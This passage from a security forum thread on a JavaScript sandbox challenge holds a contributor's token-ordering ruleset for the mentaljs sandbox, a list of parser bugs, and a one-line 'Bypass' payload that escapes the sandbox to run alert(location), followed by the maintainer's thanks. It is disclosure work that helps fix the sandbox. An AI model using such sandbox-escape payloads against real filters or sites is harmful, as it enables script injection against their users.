                89: 1, // Nothing   ?
                111: 1, // Return ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?

            },
            112: {        // RegExp        
                    copy from  36

            },
            113: {          //  RightShift   
                    copy from 5

            },
            114: {          //  RightShiftAssignment     
                   copy from 6

            },
            115: {        // String         
                  copy from  36

            },
            116: {          // StrictEqual   
                  copy from 5

            },
            117: {         //   StrictNotEqual      
                  copy from 5

            },
            118: {        // SwitchStatement        
                  copy from 18

            },
            119: VALID RULES
            120: {        // SwitchStatementParenClose   x)

                137: 1 // VarIdentifier  ?
            },
            121: VALID RULES
            122: {        //   SwitchStatementCurlyClose  x}   
                  copy from 10  
                  -- 9:1,  // BlockStatementCurlyOpen
                  ++ 121:1, // SwitchStatementCurlyOpen 
                  ++ 123:1, // SwitchColon

            },
            123: {          // SwitchColon           x:

                137: 1 // VarIdentifier   ?
            },
            124: {         // This     
                  copy from 36

            },
            125: {          // TernaryQuestionMark       x?

                  137: 1 // VarIdentifier   ?
            },
            126: {        //  TernaryColon       x:

                137: 1 // VarIdentifier   ?
            },
            127: {         // TryStatement    x try  
                  copy from 18

            },
            128: VALID RULES
            129: {         //   TryStatementCurlyClose   x}     
                  copy from 10  
                  --  9:1,  // BlockStatementCurlyOpen
                  ++  128:1, // TryStatementCurlyOpen

            },
                        130: {          // True        
                copy from 36

            },
            131: {         //  Throw           x throw
                0: 1, // ArrayComma ?
                1: 1, // ArrayOpen ?
                3: 1, // AccessorOpen ?
                14: 1, // Break ?
                15: 1, // Case  ?
                17: 1, // Delete  ?
                20: 1, // DoStatementCurlyClose  ?
                28: 1, // Comma    ?
                29: 1, // Continue ?
                41: 1, // ForStatementParenOpen ?
                45: 1, // ForSemi ?
                46: 1, // FunctionCallOpen ?
                69: 1, // IfStatementParenOpen  ?
                84: 1, // New  ?
                99: 1, // ObjectLiteralColon ?
                104: 1, // ParenExpressionOpen ?
                111: 1, // Return ?
                119: 1, // SwitchStatementParenOpen  ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                125: 1, // TernaryQuestionMark ?
                126: 1, // TernaryColon  ?
                128: 1, // TryStatementCurlyOpen  ?
                131: 1, // Throw  ?
                132: 1, // TypeOf  ?
                138: 1, // VarComma  ?
                139: 1, // Void  ?
                141: 1, // WithStatementParenOpen ?
                146: 1, // WhileStatementParenOpen  ?

            },
            132: {          //    TypeOf     x typeof

                14: 1, // Break          ?
                20: 1, // DoStatementCurlyClose  ?
                29: 1, // Continue   ?
                84: 1, // New ?
                120: 1, // SwitchStatementParenClose  ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                138: 1, // VarComma  ?

            },
            133: {         //   UnaryPlus      
                   copy from 36

            },
            134: {          //    UnaryMinus       
                  copy from 36

            },
            135: {         //    Undefined    
                  copy from   36

            },
            136: {         //  Var
                0: 1, // ArrayComma  ?
                1: 1, // ArrayOpen  ?
                3: 1, // AccessorOpen ?
                14: 1, // Break ?
                15: 1, // Case  ?
                17: 1, // Delete ?
                28: 1, // Comma ?
                29: 1, // Continue  ?
                45: 1, // ForSemi  ?
                46: 1, // FunctionCallOpen ?
                69: 1, // IfStatementParenOpen  ?
                84: 1, // New  ?
                99: 1, // ObjectLiteralColon  ?
                104: 1, // ParenExpressionOpen ?
                111: 1, // Return ?
                119: 1, // SwitchStatementParenOpen ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen  ?
                125: 1, // TernaryQuestionMark ?
                126: 1, // TernaryColon  ?
                129: 1, // TryStatementCurlyClose ?
                131: 1, // Throw  ?
                132: 1, // TypeOf  ?
                138: 1, // VarComma ?
                139: 1, // Void  ?
                141: 1, // WithStatementParenOpen ?
                146: 1, // WhileStatementParenOpen ?

            },
            137-138: VALID RULES,
            139: {        //  Void            x void     
                  copy from 36
 
            },
            140: {          //  WithStatement           x with    
                  copy from 18  
            },
            141: VALID RULES,
            142: {       //  WithStatementParenClose      x)    
                137: 1 // VarIdentifier ?
            },
            143: VALID RULES,
            144: {        //   WithStatementCurlyClose    x}    
                  copy from 10    
                  -- 9: 1, // BlockStatementCurlyOpen
                  ++ 143: 1, // WithStatementCurlyOpen
                
            },
            145: {        //  WhileStatement          
                 copy from 18 
            },
            146: VALID RULES,
            147: {    //   WhileStatementParenClose
                137: 1 // VarIdentifier    ?
            },
            148: VALID RULES,
            149: {        //  WhileStatementCurlyClose     
                copy from 10  
                -- 9: 1, // BlockStatementCurlyOpen
                ++ 148: 1, // WhileStatementCurlyOpen
               
            },
            150: {       // Xor               
                  copy from  5

            },
            151: {       // XorAssignment       
                  copy from 6

            },
            152: {        //  ZeroRightShift     
                  copy from 5

            },
            153: {        // ZeroRightShiftAssigment       
                  copy from 6

            }

------
Bugs:

1) NaN, undefined, Infinity --> NaN$, undefined$, Infinity$

2) + +i --> ++i$ (parse tree is correct)

3) do;while(0){} // last curly isn't WhileStatementCurly (incorrect parse tree)

4) [[],1] // this comma is'n Comma (incorrect parse tree)

5) "in" inside "for" loop and free "in" are different statements in terms of rules. "in" inside "for" can follow VarIdentifier, free "in" can't. The same difference between first and second ForSemi.

6) The ruleset can't prevent some syntactic violations. Example: for(;);alert(1;1)

-------

Bypass

for(var i
i/'/+alert(location);0)break//')



I'll update this post.

----------------------
~Veritas~



Edited 33 time(s). Last edit at 04/01/2014 07:11AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 13, 2014 03:43PM

@LeverOne

Thanks so much, you are an immense help. I'll format the rules and fix them when I get chance. Once again thank you, you have made mentaljs awesome.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: PreviousFirst...345678910111213
Current Page: 13 of 13


Sorry, only registered users may post in this forum.